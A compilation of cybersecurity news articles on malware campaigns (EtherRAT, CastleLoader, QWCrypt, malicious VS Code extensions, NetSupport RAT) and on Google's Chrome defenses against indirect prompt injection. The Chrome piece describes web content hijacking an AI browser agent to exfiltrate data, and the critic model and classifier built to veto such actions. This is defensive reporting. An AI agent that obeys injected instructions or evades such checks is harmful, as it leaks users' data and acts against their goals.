2025-12-10 AI创业新闻

North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware

Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical security React2Shell flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT . “EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org,” Sysdig said in a report published Monday. The cloud security firm said the activity exhibits significant overlap with a long-running campaign codenamed Contagious Interview , which has been observed leveraging the EtherHiding technique to distribute malware since February 2025. Contagious Interview is the name given to a series of attacks in which blockchain and Web3 developers, among others, are targeted through fake job interviews, coding assignments, and video assessments, leading to the deployment of malware.

These efforts typically begin with a ruse that lures victims via platforms like LinkedIn, Upwork, or Fiverr, where the threat actors pose as recruiters offering lucrative job opportunities. According to software supply chain security company Socket, it’s one of the most prolific campaigns exploiting the npm ecosystem, highlighting their ability to adapt to JavaScript and cryptocurrency-centric workflows. The attack chain commences with the exploitation of CVE-2025-55182 (CVSS score: 10.0), a maximum-severity security vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant. The shell script is retrieved using a curl command, with wget and python3 used as fallbacks.

It is also designed to prepare the environment by downloading Node.js v20.10.0 from nodejs.org, following which it writes to disk an encrypted blob and an obfuscated JavaScript dropper. Once all these steps are complete, it proceeds to delete the shell script to minimize the forensic trail and runs the dropper. The primary goal of the dropper is to decrypt the EtherRAT payload with a hard-coded key and spawn it using the downloaded Node.js binary. The malware is notable for using EtherHiding to fetch the C2 server URL from an Ethereum smart contract every five minutes, allowing the operators to update the URL easily, even if it’s taken down.

“What makes this implementation unique is its use of consensus voting across nine public Ethereum remote procedure call (RPC) endpoints,” Sysdig said. “EtherRAT queries all nine endpoints in parallel, collects responses, and selects the URL returned by the majority.” “This consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating a rogue RPC node.” It’s worth noting that a similar implementation was previously observed in two npm packages named colortoolsv2 and mimelib2 that were found to deliver downloader malware on developer systems. Once EtherRAT establishes contact with the C2 server, it enters a polling loop that executes every 500 milliseconds, interpreting any response that’s longer than 10 characters as JavaScript code to be run on the infected machine. Persistence is accomplished by using five different methods - Systemd user service XDG autostart entry Cron jobs .bashrc injection Profile injection By using multiple mechanisms, the threat actors can ensure the malware runs even after a system reboot and grants them continued access to the infected systems.

Another sign that points to the malware’s sophistication is the self-update ability that overwrites itself with the new code received from the C2 server after sending its own source code to an API endpoint. It then launches a new process with the updated payload. What’s notable here is that the C2 returns a functionally identical but differently obfuscated version, thereby possibly allowing it to bypass static signature-based detection. In addition to the use of EtherHiding, the links to Contagious Interview stem from overlaps between the encrypted loader pattern used in EtherRAT and a known JavaScript information stealer and downloader named BeaverTail .

“EtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft toward persistent, stealthy access designed for long-term operations,” Sysdig said. “Whether this represents North Korean actors pivoting to new exploitation vectors or sophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new implant that resists traditional detection and takedown methods.” Contagious Interview Shifts from npm to VS Code The disclosure comes as OpenSourceMalware revealed details of a new Contagious Interview variant that urges victims to clone a malicious repository on GitHub, GitLab, or Bitbucket as part of a programming assignment, and launch the project in Microsoft Visual Studio Code (VS Code). This results in the execution of a VS Code tasks.json file due to it being configured with runOptions.runOn: ‘folderOpen,’ causing it to auto-run as soon as the project is opened. The file is engineered to download a loader script using curl or wget based on the operating system of the compromised host.

In the case of Linux, the next stage is a shell script that downloads and runs another shell script named “vscode-bootstrap.sh,” which then fetches two more files, “package.json” and “env-setup.js,” the latter of which serves as a launchpad for BeaverTail and InvisibleFerret. OpenSourceMalware said it identified 13 different versions of this campaign spread across 27 different GitHub users and 11 different versions of BeaverTail. The earliest repository (“github[.]com/MentarisHub121/TokenPresaleApp”) dates back to April 22, 2025, and the most recent version (“github[.]com/eferos93/test4”) was created on December 1, 2025. “DPRK threat actors have flocked to Vercel, and are now using it almost exclusively,” the OpenSourceMalware team said.

“We don’t know why, but Contagious Interview has stopped using Fly.io, Platform.sh, Render and other hosting providers.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Four Threat Clusters Using CastleLoader as GrayBravo Expands Its Malware Service Infrastructure

Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader , strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model. The threat actor behind CastleLoader has been assigned the name GrayBravo by Recorded Future’s Insikt Group, which was previously tracking it as TAG-150 . GrayBravo is “characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure,” the Mastercard-owned company said in an analysis published today. Some of the notable tools in the threat actor’s toolset include a remote access trojan called CastleRAT and a malware framework referred to as CastleBot, which comprises three components: a shellcode stager/downloader, a loader, and a core backdoor.

The CastleBot loader is responsible for injecting the core module, which is equipped to contact its command-and-control (C2) server to retrieve tasks that enable it to download and execute DLL, EXE, and PE (portable executable) payloads. Some of the malware families distributed via this framework are DeerStealer , RedLine Stealer , StealC Stealer , NetSupport RAT , SectopRAT , MonsterV2 , WARMCOOKIE , and even other loaders like Hijack Loader . Recorded Future’s latest analysis has uncovered four clusters of activity, each operating with distinct tactics - Cluster 1 (TAG-160) , which targets the logistics sector using phishing and ClickFix techniques to distribute CastleLoader (Active since at least March 2025) Cluster 2 (TAG-161) , which uses Booking.com-themed ClickFix campaigns to distribute CastleLoader and Matanbuchus 3.0 (Active since at least June 2025) Cluster 3 , which uses infrastructure impersonating Booking.com in conjunction with ClickFix and Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader (Active since at least March 2025) Cluster 4 , which uses malvertising and fake software update lures masquerading as Zabbix and RVTools to distribute CastleLoader and NetSupport RAT (Active since at least April 2025) GrayBravo has been found to leverage a multi-tiered infrastructure to support its operations. This includes Tier 1 victim-facing C2 servers associated with malware families like CastleLoader, CastleRAT, SectopRAT, and WARMCOOKIE, as well as multiple VPS servers that likely operate as backups.

The attacks mounted by TAG-160 are also notable for using fraudulent or compromised accounts created on freight-matching platforms like DAT Freight & Analytics and Loadlink Technologies to enhance the credibility of its phishing campaigns. The activity, Recorded Future added, illustrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. It’s been assessed with low confidence that the activity could be related to another unattributed cluster that targeted transportation and logistics companies in North America last year to distribute various malware families. “GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware,” Recorded Future said.

“This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading

The threat actor known as Storm-0249 is likely shifting from its role as an initial access broker to adopt a combination of more advanced tactics like domain spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware attacks. “These methods allow them to bypass defenses, infiltrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams,” ReliaQuest said in a report shared with The Hacker News. Storm-0249 is the moniker assigned by Microsoft to an initial access broker that has sold footholds into organizations to other cybercrime groups, including ransomware and extortion actors like Storm-0501 . It was first highlighted by the tech giant in September 2024.

Then, earlier this year, Microsoft also revealed details of a phishing campaign mounted by the threat actor that used tax-related themes to target users in the U.S. ahead of the tax filing season and infect them with Latrodectus and the BruteRatel C4 (BRc4) post-exploitation framework. The end goal of these infections is to obtain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, providing them with a ready supply of targets, and accelerating the pace of such attacks. The latest findings from ReliaQuest demonstrate a tactical shift, where Storm-0249 has resorted to using the infamous ClickFix social engineering tactic to trick prospective targets into running malicious commands via the Windows Run dialog under the pretext of resolving a technical issue.

In this case, the command copied and executed leverages the legitimate “curl.exe” to fetch a PowerShell script from a URL that mimics a Microsoft domain to give victims a false sense of trust (“sgcipl[.]com/us.microsoft.com/bdo/”) and execute it in a fileless manner via PowerShell. This, in turn, results in the execution of a malicious MSI package with SYSTEM privileges, which drops a trojanized DLL associated with SentinelOne’s endpoint security solution (“SentinelAgentCore.dll”) into the user’s AppData folder along with the legitimate “SentinelAgentWorker.exe” executable. In doing so, the idea is to sideload the rogue DLL when the “SentinelAgentWorker.exe” process is launched, thereby allowing the activity to stay undetected. The DLL then establishes encrypted communication with a command-and-control (C2) server.

Storm-0249 has also been observed making use of legitimate Windows administrative utilities like reg.exe and findstr.exe to extract unique system identifiers like MachineGuid to lay the groundwork for follow-on ransomware attacks. The use of living-off-the-land (LotL) tactics, coupled with the fact that these commands are run under the trusted “SentinelAgentWorker.exe” process, means the activity is unlikely to raise any red flags. The findings indicate a departure from mass phishing campaigns to precision attacks that weaponize the trust associated with signed processes for added stealth. “This isn’t just generic reconnaissance – it’s preparation for ransomware affiliates,” ReliaQuest said.

“Ransomware groups like LockBit and ALPHV use MachineGuid to bind encryption keys to individual victim systems.” “By tying encryption keys to MachineGuid, attackers ensure that even if defenders capture the ransomware binary or attempt to reverse-engineer the encryption algorithm, they cannot decrypt files without the attacker-controlled key.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

How to Streamline Zero Trust Using the Shared Signals Framework

Zero Trust helps organizations shrink their attack surface and respond to threats faster, but many still struggle to implement it because their security tools don’t share signals reliably. 88% of organizations admit they’ve suffered significant challenges in trying to implement such approaches, according to Accenture . When products can’t communicate, real-time access decisions break down. The Shared Signals Framework (SSF) aims to fix this with a standardized way to exchange security events.

Yet adoption is uneven. For example, Kolide Device Trust doesn’t currently support SSF. Scott Bean, Senior IAM and Security Engineer at MongoDB, proposed a way to solve the problem, giving teams an easy and intuitive way to operationalize SSF across their environment. In this guide, we’ll share an overview of the workflow , plus step-by-step instructions for getting it up and running.

The problem – IAM tools don’t support SSF A core requirement of Zero Trust is continuous, reliable signals about user and device posture. But many tools don’t support SSF for Continuous Access Evaluation Protocol (CAEP), making it hard to share or act on these signals. Teams often face three challenges: Tools lack native SSF support Signals require enrichment or correlation Managing SSF endpoints and token handling adds overhead Without this interoperability, organizations struggle to apply consistent policies — and in cases like Kolide Device Trust, critical device events never reach systems like Okta. The solution – a SSF transmitter that turns Kolide issues into CAEP events Because SSF is built on HTTPS requests, the OpenID standard works with Tines’ HTTP Action.

Scott developed a new workflow integrating Kolide Device Trust with Tines , enabling it to send SSF signals to Okta. If a device is non-compliant, Kolide sends a message to the workflow via webhook. Tines enriches the signal, makes sure it can be linked to a user, builds a Security Event Token (SET), and then sends it to Okta. In this way, Tines acts as the connective tissue that makes SSF work across the distributed IT environment, even if individual tools don’t natively support the standard.

Tines can: Receive signals from Kolide (and tools like it) via webhook when a device becomes non-compliant Enrich and correlate those signals (e.g., map device to user) Generate and sign SETs that meet the SSF specification Deliver them to Okta (and other identity providers) to enforce Zero Trust Host required SSF metadata endpoints using API path prefixes, giving consuming systems a standards-compliant place to fetch keys and decrypt tokens All of which makes Zero Trust enforcement faster, more reliable, and much easier to operationalize. IT teams are empowered with continuous, real-time risk assessment of devices, faster response to threats, and more flexible policy orchestration. And end users get the benefit of automated remediation, which helps to optimize productivity and minimize IT intervention. If you want to go deeper into identity modernization, the Tines IAM guide explores how teams are unifying device trust, access decisions, and least-privilege enforcement with automation.

Scott’s workflow is one of several real-world patterns inside. Workflow overview Required tools: Tines – workflow orchestration and AI platform Kolide – device trust and posture monitoring Okta – identity platform receiving CAEP events Required credentials: Tines API Key - Team Scoped with the Editor role Kolide API Key - Read Only Kolide Webhook Signing Secret Required resources: Okta domain, such as example.okta.com, example.oktapreview.com, or a branded domain. How it works: The workflow creates a proof-of-concept SSF transmitter that can be registered with Okta and sends device compliance change CAEP events (sent as SETs), based on issues generated in Kolide. There are three elements: 1.

Generate and store SET signing keys (SETs are signed JSON Web Tokens): Creates an RSA key pair and converts it to JWK format. Publishes the public key for SSF receivers to validate SET signatures. Stores the private JWK keyset as a Tines secret. 2.

Expose SSF transmitter API SSF receivers (like Okta) need: a .well-known/sse-configuration endpoint describing the transmitter a JWK endpoint exposing the public key used to verify SET signatures a webhook trigger acts as the SSF API surface logic returns the .well-known config logic returns the JWKs Once this is live, teams can register a new SSF receiver in Okta under: Security → Device Integrations → Receive shared signals And create a new stream using the API’s URL and the new .well-known endpoint

Create, sign and send of SETs from Kolide events Receives Kolide issue events via webhook and validates them using the signing secret. Fetches device and user metadata from Kolide. Builds a SET for a Device Compliance Change CAEP event.

Signs the SET with the stored private key using the JWT_SIGN formula. Sends the signed token to Okta’s security-events endpoint. This delivers real-time device-compliance updates to Okta so access policies can respond immediately. Configuring the workflow — a step-by-step guide You can build and run this entire workflow using Tines Community Edition .

Log into Tines or create a new account. 2. Navigate to the pre-built workflow in the library.

Select import. This should take you straight to your new pre-built workflow. 3. Gather the required credentials Tines API Key (team-scoped with Editor role) Kolide API Key (read-only) Kolide Webhook Signing Secret These ensure authenticated calls to Kolide and secure webhook validation.

Collect your required resources You’ll need an Okta tenant domain, such as: example.oktapreview.com example.okta.com or your custom Okta brand domain This domain is used when sending signed SETs to Okta’s security-events endpoint. Note: In the example provided, Scott set up as a push rather than a poll provider as tokens are sent based off of inbound webhooks, so there’s no need to store state . 5.

Generate your SET signing keys Use the Generate JWK keyset action to create RSA keys Convert both public and private keys to JWK format (two event transforms) Store the resulting keyset using a Tines secret This is required before Okta will accept and verify your SETs. 6. Publish the SSF transmitter API The SSF API webhook contains two branches: .well-known endpoint Trigger: well-known Event transform: returns the SSF configuration declaring the transmitter’s capabilities JWKS endpoint Trigger: JWKs Event transform: returns the public JWKs so Okta can verify signatures Once live, Okta can register this transmitter as a shared signals sender. 7.

Connect Kolide and process device issues The Kolide integration flow follows these steps: Webhook: Kolide webhook – receives issue opened/resolved events Get device details – fetches metadata for the device involved Device has a user – branching logic to confirm a user is associated Get user details – look up user metadata for the CAEP payload Depending on whether the issue is new or resolved: Build SET – construct the CAEP device_compliance_change event Sign SET – use the RSA private key stored earlier to produce an SSF-compliant SET Send SET – send the final signed token to Okta’s security-events endpoint As soon as Okta receives and verifies the SET, the associated user risk level updates. Bringing it all together SSF exists to help security tools speak the same language, delivering continuous insight into risk and device posture. But when key tools don’t support the standard, gaps open up, and access policies lag behind real-world changes. Tines bridges these gaps by enabling new intelligent workflows.

They ensure that even tools that don’t support SSF can send information in the same standardized way. By using Tines to generate, sign, and deliver compliance signals in real time, you get the benefits of SSF even when the source tool wasn’t built for it. If you’d like to try this workflow yourself, you can spin it up in minutes with a free Tines account . And if you want to see how device posture fits into a broader identity strategy, this guide to modern IAM workflows offers practical patterns and real-world workflows like Scott’s you can start building on today.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Google Adds Layered Defenses to Chrome to Block Indirect Prompt Injection Threats

Google on Monday announced a set of new security features in Chrome, following the company’s addition of agentic artificial intelligence (AI) capabilities to the web browser. To that end, the tech giant said it has implemented layered defenses to make it harder for bad actors to exploit indirect prompt injections that arise as a result of exposure to untrusted web content and inflict harm. Chief among the features is a User Alignment Critic, which uses a second model to independently evaluate the agent’s actions in a manner that’s isolated from malicious prompts. This approach complements Google’s existing techniques, like spotlighting , which instruct the model to stick to user and system instructions rather than abiding by what’s embedded in a web page.

“The User Alignment Critic runs after the planning is complete to double-check each proposed action,” Google said . “Its primary focus is task alignment: determining whether the proposed action serves the user’s stated goal. If the action is misaligned, the Alignment Critic will veto it.” The component is designed to view only metadata about the proposed action and is prevented from accessing any untrustworthy web content, thereby ensuring that it is not poisoned through malicious prompts that may be included in a website. With the User Alignment Critic, the idea is to provide safeguards against any malicious attempts to exfiltrate data or hijack the intended goals to carry out the attacker’s bidding.

“When an action is rejected, the Critic provides feedback to the planning model to re-formulate its plan, and the planner can return control to the user if there are repeated failures,” Nathan Parker from the Chrome security team said. Google is also enforcing what’s called Agent Origin Sets to ensure that the agent only has access to data from origins that are relevant to the task at hand or data sources the user has opted to share with the agent. This aims to address site isolation bypasses where a compromised agent can interact with arbitrary sites and enable it to exfiltrate data from logged-in sites. This is implemented by means of a gating function that determines which origins are related to the task and categorizes them into two sets - Read-only origins, from which Google’s Gemini AI model is permitted to consume content Read-writable origins, to which the agent can type or click on in addition to reading from “This delineation enforces that only data from a limited set of origins is available to the agent, and this data can only be passed on to the writable origins,” Google explained.

“This bounds the threat vector of cross-origin data leaks.” Similar to the User Alignment Critic, the gating function is not exposed to untrusted web content. The planner is also required to obtain the gating function’s approval before adding new origins, although it can use context from the web pages a user has explicitly shared in a session. Another key pillar underpinning the new security architecture relates to transparency and user control, allowing the agent to create a work log for user observability and request their explicit approval before navigating to sensitive sites, such as banking and healthcare portals, permitting sign-ins via Google Password Manager, or completing web actions like purchases, payments, or sending messages. Lastly, the agent also checks each page for indirect prompt injections and operates alongside Safe Browsing and on-device scam detection to block potentially suspicious content.

“This prompt-injection classifier runs in parallel to the planning model’s inference, and will prevent actions from being taken based on content that the classifier determined has intentionally targeted the model to do something unaligned with the user’s goal,” Google said. To further incentivize research and poke holes in the system, the company said it will pay up to $20,000 for demonstrations that result in a breach of the security boundaries. These include indirect prompt injections that allow an attacker to - Carry out rogue actions without confirmation Exfiltrate sensitive data without an effective opportunity for user approval Bypass a mitigation that should have ideally prevented the attack from succeeding in the first place “By extending some core principles like origin-isolation and layered defenses, and introducing a trusted-model architecture, we’re building a secure foundation for Gemini’s agentic experiences in Chrome,” Google said. “We remain committed to continuous innovation and collaboration with the security community to ensure Chrome users can explore this new era of the web safely.” The announcement follows research from Gartner that called on enterprises to block the use of agentic AI browsers until the associated risks, such as indirect prompt injections, erroneous agent actions, and data loss, can be appropriately managed.

The research also warns of a possible scenario where employees “might be tempted to use AI browsers and automate certain tasks that are mandatory, repetitive, and less interesting.” This could cover cases where an individual dodges mandatory cybersecurity training by instructing the AI browser to complete it on their behalf. “Agentic browsers, or what many call AI browsers, have the potential to transform how users interact with websites and automate transactions while introducing critical cybersecurity risks,” the advisory firm said. “CISOs must block all AI browsers in the foreseeable future to minimize risk exposure.” The development comes as the U.S. National Cyber Security Centre (NCSC) said that large language models (LLMs) may suffer from a persistent class of vulnerability known as prompt injection and that the problem can never be resolved in its entirety.

“Current large language models (LLMs) simply do not enforce a security boundary between instructions and data inside a prompt,” said David C, NCSC technical director for Platforms Research. “Design protections need to therefore focus more on deterministic (non-LLM) safeguards that constrain the actions of the system, rather than just attempting to prevent malicious content reaching the LLM.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

STAC6565 Targets Canada in 80% of Attacks as Gold Blade Deploys QWCrypt Ransomware

Canadian organizations have emerged as the focus of a targeted cyber campaign orchestrated by a threat activity cluster known as STAC6565 . Cybersecurity company Sophos said it investigated almost 40 intrusions linked to the threat actor between February 2024 and August 2025. The campaign is assessed with high confidence to share overlaps with a hacking group known as Gold Blade , which is also tracked under the names Earth Kapre, RedCurl, and Red Wolf. The financially motivated threat actor is believed to be active since late 2018 , initially targeting entities in Russia, before expanding its focus to entities in Canada, Germany, Norway, Russia, Slovenia, Ukraine, the U.K., and the U.S.

The group has a history of using phishing emails to conduct commercial espionage. However, recent attack waves have found RedCurl to have engaged in ransomware attacks using a bespoke malware strain dubbed QWCrypt . One of the notable tools in the threat actor’s arsenal is RedLoader, which sends information about the infected host to a command-and-control (C2) server and executes PowerShell scripts to collect details related to the compromised Active Directory (AD) environment. “This campaign reflects an unusually narrow geographic focus for the group, with almost 80% of the attacks targeting Canadian organizations,” Sophos researcher Morgan Demboski said.

“Once focused primarily on cyber espionage, Gold Blade has evolved its activity into a hybrid operation that blends data theft with selective ransomware deployment via a custom locker named QWCrypt.” Other prominent targets include the U.S., Australia, and the U.K., with services, manufacturing, retail, technology, non-governmental organizations, and transportation sectors hit the hardest during the time period. The group is said to be operating under a “hack-for-hire” model, carrying out tailored intrusions on behalf of clients, while deploying ransomware on the side to monetize the intrusions. Although a 2020 report from Group-IB raised the possibility of it being a Russian-speaking group, there are currently no indications to confirm or deny this assessment. Describing RedCurl as a “professionalized operation,” Sophos said the threat actor stands apart from other cybercriminal groups owing to its ability to refine and evolve its tradecraft, as well as mount discreet extortion attacks.

That said, there is no evidence to suggest it’s state-sponsored or politically motivated. The cybersecurity company also pointed out that the operational tempo is marked by periods of no activity, followed by sudden spikes in attacks using improved tactics, indicating that the hacking group could be using the downtime to refresh its toolset. STAC6565 begins with spear-phishing emails targeting human resources (HR) personnel to trick them into opening malicious documents disguised as resumes or cover letters. Since at least November 2024, the activity has leveraged legitimate job search platforms like Indeed, JazzHR, and ADP WorkforceNow to upload the weaponized resumes as part of a job application process.

“As recruitment platforms enable HR staff to review all incoming resumes, hosting payloads on these platforms and delivering them via disposable email domains not only increases the likelihood that the documents will be opened but also evades detection by email-based protections,” Demboski explained. In one incident, a fake resume uploaded to Indeed has been found to redirect users to a booby-trapped URL that ultimately led to the deployment of QWCrypt ransomware by means of a RedLoader chain. At least three different RedLoader delivery sequences have been observed in September 2024, March/April 2025, and July 2025. Some aspects of the delivery chains were previously detailed by Huntress, eSentire, and Bitdefender.

The major change observed in July 2025 concerns the use of a ZIP archive that’s dropped by the bogus resume. Present within the archive is a Windows shortcut (LNK) that impersonates a PDF. The LNK file uses “rundll32.exe” to fetch a renamed version of “ADNotificationManager.exe” from a WebDAV server hosted behind a Cloudflare Workers domain. The attack then launches the legitimate Adobe executable to sideload the RedLoader DLL (named “srvcli.dll” or “netutils.dll”) from the same WebDAV path.

The DLL proceeds to connect to an external server to download and execute the second-stage payload, a standalone binary that’s responsible for connecting to a different server and retrieving the third-stage standalone executable alongside a malicious DAT file and a renamed 7-Zip file. Both stages rely on Microsoft’s Program Compatibility Assistant (“pcalua.exe”) for payload execution, an approach seen in previous campaigns as well. The only difference is that the format of the payloads transitioned in April 2025 to EXEs instead of DLLs. “The payload parses the malicious .dat file and checks internet connectivity.

It then connects to another attacker-controlled C2 server to create and run a .bat script that automates system discovery,” Sophos said. “The script unpacks Sysinternals AD Explorer and runs commands to gather details such as host information, disks, processes, and installed antivirus (AV) products.” The results of the execution are packaged into an encrypted, password-protected 7-Zip archive and transferred to a WebDAV server controlled by the attacker. RedCurl has also been observed using RPivot, an open-source reverse proxy, and Chisel SOCKS5 for C2 communications. Another tool used in the attacks is a customized version of the Terminator tool that leverages a signed Zemana AntiMalware driver to kill antivirus-related processes via what’s called a Bring Your Own Vulnerable Driver (BYOVD) attack.

In at least one case in April 2025, the threat actors renamed both the components before distributing them via SMB shares to all servers in the victim environment. Sophos also noted that a majority of these attacks were detected and mitigated before the installation of QWCrypt. However, three of the attacks – one in April and two in July 2025 – led to a successful deployment. “In the April incident, the threat actors manually browsed and collected sensitive files, then paused activity for over five days before deploying the locker,” it added.

“This delay may suggest the attackers turned to ransomware after trying to monetize the data or failing to secure a buyer.” The QWCrypt deployment scripts are tailored to the target environment, often containing a victim-specific ID in the file names. The script, once launched, checks whether the Terminator service is running before taking steps to disable recovery and execute the ransomware on endpoint devices across the network, including the organization’s hypervisors. In the last stage, the script runs a cleanup batch script to delete existing shadow copies and every PowerShell console history file to inhibit forensic recovery. “Gold Blade’s abuse of recruitment platforms, cycles of dormancy and bursts, and continual refinement of delivery methods demonstrate a level of operational maturity not typically associated with financially motivated actors,” Sophos said.

“The group maintains a comprehensive and well-organized attack toolkit, including modified versions of open-source tooling and custom binaries to facilitate a multi-stage malware delivery chain.” The disclosure comes as Huntress said it has noticed a huge spike in ransomware attacks on hypervisors, jumping from 3% in the first half of the year to 25% so far in the second half, primarily driven by the Akira group. “Ransomware operators deploy ransomware payloads directly through hypervisors, bypassing traditional endpoint protections entirely. In some instances, attackers leverage built-in tools such as OpenSSL to perform encryption of the virtual machine volumes, avoiding the need to upload custom ransomware binaries,” wrote researchers Anna Pham, Ben Bernstein, and Dray Agha. “This shift underscores a growing and uncomfortable trend: attackers are targeting the infrastructure that controls all hosts, and with access to the hypervisor, adversaries dramatically amplify the impact of their intrusion.” Given the heightened focus of threat actors on hypervisors, it’s advised to use local ESXi accounts, enforce multi-factor authentication (MFA), implement a strong password policy, segregate the hypervisor’s management network from production and general user networks, deploy a jump box to audit admin access, limit access to the control plane, and restrict ESXi management interface access to specific administrative devices.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Researchers Find Malicious VS Code, Go, npm, and Rust Packages Stealing Developer Data

Cybersecurity researchers have discovered two new extensions on Microsoft Visual Studio Code (VS Code) Marketplace that are designed to infect developer machines with stealer malware. The VS Code extensions masquerade as a premium dark theme and an artificial intelligence (AI)-powered coding assistant, but, in actuality, harbor covert functionality to download additional payloads, take screenshots, and siphon data. The captured information is then sent to an attacker-controlled server. “Your code.

Your emails. Your Slack DMs. Whatever’s on your screen, they’re seeing it too,” Koi Security’s Idan Dardikman said . “And that’s just the start.

It also steals your WiFi passwords, reads your clipboard, and hijacks your browser sessions.” The names of the extensions are below - BigBlack.bitcoin-black (16 installs) - Removed by Microsoft on December 5, 2025 BigBlack.codo-ai (25 installs) - Removed by Microsoft on December 8, 2025 Microsoft’s list of removed extensions from the Marketplace shows that the company also removed a third package named “BigBlack.mrbigblacktheme” from the same publisher for containing malware. Dardikman told The Hacker News that the extension also contained the same malware as the other two, but noted it caused no real-world impact as it was removed quickly. While “BigBlack.bitcoin-black” activates on every VS Code action, Codo AI embeds its malicious functionality within a working tool, thereby allowing it to bypass detection. Earlier versions of the extensions came with the ability to execute a PowerShell script to download a password-protected ZIP archive from an external server (“syn1112223334445556667778889990[.]org”) and extract from it the main payload using four different methods: Windows native Expand-Archive, .NET System.IO.Compression, DotNetZip, and 7-Zip (if installed).

That said, the attacker is said to have inadvertently shipped a version that created a visible PowerShell window and could have alerted the user. Subsequent iterations, however, have been found to hide the window and streamline the entire process by switching to a batch script that uses a curl command to download the executable and DLL. The executable is the legitimate Lightshot binary that’s used to load the rogue DLL (“Lightshot.dll”) via DLL hijacking, which proceeds to gather clipboard contents, a list of installed apps, running processes, desktop screenshots, stored Wi-Fi credentials, and detailed system information. It also launches Google Chrome and Microsoft Edge in headless mode to grab stored cookies and hijack user sessions.

“A developer could install what looks like a harmless theme or a useful AI tool, and within seconds their WiFi passwords, clipboard contents, and browser sessions are being exfiltrated to a remote server,” Dardikman said. The disclosure comes as Socket said it identified malicious packages across the Go, npm, and Rust ecosystems that are capable of harvesting sensitive data - Go packages named “github[.]com/bpoorman/uuid” and “github[.]com/bpoorman/uid” that have been available since 2021 and typosquat trusted UUID libraries (“github[.]com/google/uuid” and “github[.]com/pborman/uuid”) to exfiltrate data to a paste site called dpaste when an application explicitly invokes a supposed helper function named “valid” along with the information to be validated. A set of 420 unique npm packages published by a likely French-speaking threat actor that follows a consistent naming pattern including “elf-stats-*,” some of which contain code to execute a reverse shell and exfiltrate files to a Pipedream endpoint. A Rust crate named finch-rust published by faceless, that impersonates the legitimate bioinformatics tool “finch” and serves as a loader for a malicious payload through a credential-stealing package known as “sha-rust” when a developer uses the library’s sketch serialization functionality.

“Finch-rust acts as a malware loader; it contains mostly legitimate code copied from the legitimate finch package but includes a single malicious line that loads and executes the sha-rust payload,” Socket researcher Kush Pandya said. “This separation of concerns makes detection harder: finch-rust looks benign in isolation, while sha-rust contains the actual malware.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT

Cybersecurity researchers are calling attention to a new campaign dubbed JS#SMUGGLER that has been observed leveraging compromised websites as a distribution vector for a remote access trojan named NetSupport RAT . The attack chain, analyzed by Securonix, involves three main moving parts: An obfuscated JavaScript loader injected into a website, an HTML Application (HTA) that runs encrypted PowerShell stagers using “mshta.exe,” and a PowerShell payload that’s designed to download and execute the main malware. “NetSupport RAT enables full attacker control over the victim host, including remote desktop access, file operations, command execution, data theft, and proxy capabilities,” researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee said . There is little evidence at this stage to tie the campaign to any known threat group or country.

The activity has been found to target enterprise users through compromised websites, indicative of a broad-strokes effort. The cybersecurity company described it as a multi-stage web-based malware operation that employs hidden iframes, obfuscated loaders, and layered script execution for malware deployment and remote control. In these attacks, silent redirects embedded into the infected websites act as a conduit for a heavily scrambled JavaScript loader (“phone.js”) retrieved from an external domain, which then profiles the device to determine whether to serve a full-screen iframe (when visiting from a mobile phone) or load another remote second-stage script (when visiting from a desktop). The invisible iframe is designed to direct the victim to a malicious URL.

The JavaScript loader incorporates a tracking mechanism to ensure that the malicious logic is fired only once and during the first visit, thereby minimizing the chances of detection. “This device-aware branching enables attackers to tailor the infection path, hide malicious activity from certain environments, and maximize their success rate by delivering platform-appropriate payloads while avoiding unnecessary exposure,” the researchers said. The remote script downloaded in the first stage of the attack lays the foundation by constructing at runtime a URL from which an HTA payload is downloaded and executed using “mshta.exe.” The HTA payload is another loader for a temporary PowerShell stager, which is written to disk, decrypted, and executed directly in memory to evade detection. Furthermore, the HTA file is run stealthily by disabling all visible window elements and minimizing the application at startup.

